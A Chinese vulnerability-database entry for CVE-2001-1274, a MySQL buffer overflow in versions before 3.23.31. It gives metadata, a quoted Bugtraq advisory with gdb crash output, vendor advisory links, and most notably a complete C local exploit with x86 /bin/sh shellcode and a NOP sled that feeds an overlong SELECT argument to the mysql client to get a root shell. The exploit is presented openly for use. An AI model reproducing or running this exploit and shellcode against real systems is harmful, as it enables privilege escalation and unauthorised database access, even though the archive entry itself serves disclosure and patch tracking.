MySQL缓冲区溢出漏洞
漏洞ID | 1106174 | 漏洞类型 | 其他 |
发布时间 | 2001-01-18 | 更新时间 | 2001-01-23 |
CVE编号 | CVE-2001-1274 |
CNNVD-ID | CNNVD-200101-129 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。
MySQL 3.23.31之前版本存在缓冲区溢出漏洞。攻击者可以导致服务拒绝并且可能提升特权。
MySQL 3.23.31之前版本存在缓冲区溢出漏洞。攻击者可以导致服务拒绝并且可能提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2262/info
MySQL is a widely used Open Source database tool. Versions of MySQL up to and including 3.23.30 are vulnerable to a buffer overflow attack.
By supplying an excessively long string as an argument for a SELECT statement, it is possible for a local attacker to overflow mysql's query string buffer.
As a result of this overflow, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling function's return address. Since this data is supplied by the user, it can be made to alter the program's flow of execution.
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
[email protected]
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]
Advisorie:
[from a bugtraq email]
Hi,
all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
server and which seems to be exploitable (ie. 4141414 in eip)
Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)
Requirements :
You need a valid login/password to exploit this
Solution :
Upgrade to 3.23.31
Proof-of-concept code :
None
Credits :
I'm not the discoverer of this bug
The first public report was made by [email protected] via the MySQL
mailing-list
See the following mails for details
Regards,
Nicob
Here the original post to the MySQL mailing-list :
==================================================
On Jan 12, Jo?o Gouveia wrote:
> Hi,
>
I believe i've found a problem in MySql. Here are some test's i've made
in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).Confirmed up to latest 3.23
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
></quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > msql -p -e 'select a.'`perl
-e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal i got:
> <quote>
> sike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation
fault
> nohup
> $ledir/myqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR
--skip-lockin
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
>
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> [email protected]
Here the reponse to a email I send today to the MySQL list :
============================================================
Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei
Here an part of the 3.23.30 to 3.23.31 diff :
=============================================
+Changes in release 3.23.31
+--------------------------
+
+ * Fixed security bug in something (please upgrade if you are using a
+ earlier MySQL 3.23 version).
End of Advisorie
Final Words: Yes..i'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...i just wave everybody :]
*/
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/bin/sh";
unsigned
long get_sp(void) {
__asm__("movl %esp,%eax");
}
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("nMySQL [al versions < 3.23.31] Local Exploit by
[email protected]");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!n");
printf("Couldn't allocate memory...n");
printf("Exiting...n");
exit(0);
}
printf("SUCCESS!n");
addr=get_sp()-offset;
printf("Using address : 0x%xn", addr);
printf("Offset : %dn",offset);
printf("Buffer Size : %dn",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]=' ';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :Pn");
printf("So...[if all went well], prepare to be r00t...n");
system(tmp);
}
|受影响的产品
MySQL AB MySQL 3.23.31
+
MandrakeSoft Single Network Firewall 7.2
+
Mandriva Linux Mandrake 7.2
|参考资料
来源:DEBIAN
名称:DSA-013
链接:http://www.debian.org/security/2001/dsa-013
来源:REDHAT
名称:RHSA-2001:003
链接:http://www.redhat.com/support/errata/RHSA-2001-003.html
来源:www.mysql.com
链接:http://www.mysql.com/documentation/mysql/bychapter/manual_News.html#News-3.23.3
来源:MANDRAKE
名称:MDKSA-2001:014
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-014.php3
来源:CALDERA
名称:CSSA-2001-006.0
链接:http://www.calderasystems.com/support/security/advisories/CSSA-2001-006.0.txt
来源:FREEBSD
名称:FreeBSD-SA-01:16
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98089552030459&w;=2
来源:CONECTIVA
名称:CLA-2001:375
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000375
bash缓冲区溢出漏洞 漏洞ID 1207292 漏洞类型 缓冲区溢出 发布时间 1998-09-05 更新时间 1998-09-05 CVE编号 CVE-1999-1048 CNNVD-ID CNNVD-199809-009 漏洞平台 N/A CVSS评分 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666